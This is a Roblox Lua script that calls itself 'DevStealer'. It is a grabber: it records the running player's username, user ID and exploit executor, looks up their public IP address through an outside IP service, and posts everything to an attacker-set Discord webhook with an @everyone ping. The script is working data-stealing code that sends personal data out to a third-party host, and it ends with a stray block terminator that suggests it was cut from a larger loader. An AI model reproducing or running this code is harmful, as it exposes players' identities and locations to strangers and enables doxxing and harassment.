
local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Kid with shit exploit"

   local fardplayer = game.Players.LocalPlayer
   local username = game:GetService("Players").LocalPlayer.Name
   local data = {
   ["content"] = "@everyone",
   ["embeds"] = {
       {
           ["title"] = "**DevStealer**",
           ["description"] = "```Username: " .. game.Players.LocalPlayer.Name.."```",
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           },   
           ["fields"] = {
            {
                ["name"] = "``Data Generated``",
                ["value"] = "``Username :`` **" ..username .." **\n``User ID : ``**" ..fardplayer.userId .. "**\n**``Account Age :``** **``not found``**\n**``Device :``** **Computer**\n``Exploit :`` "..webhookcheck.."\n``IP Address : ``"..game:HttpGet('https://api.ipify.org/').."", 
                ["inline"] = false
            }
            
        }
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = _G.Webhook, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
end
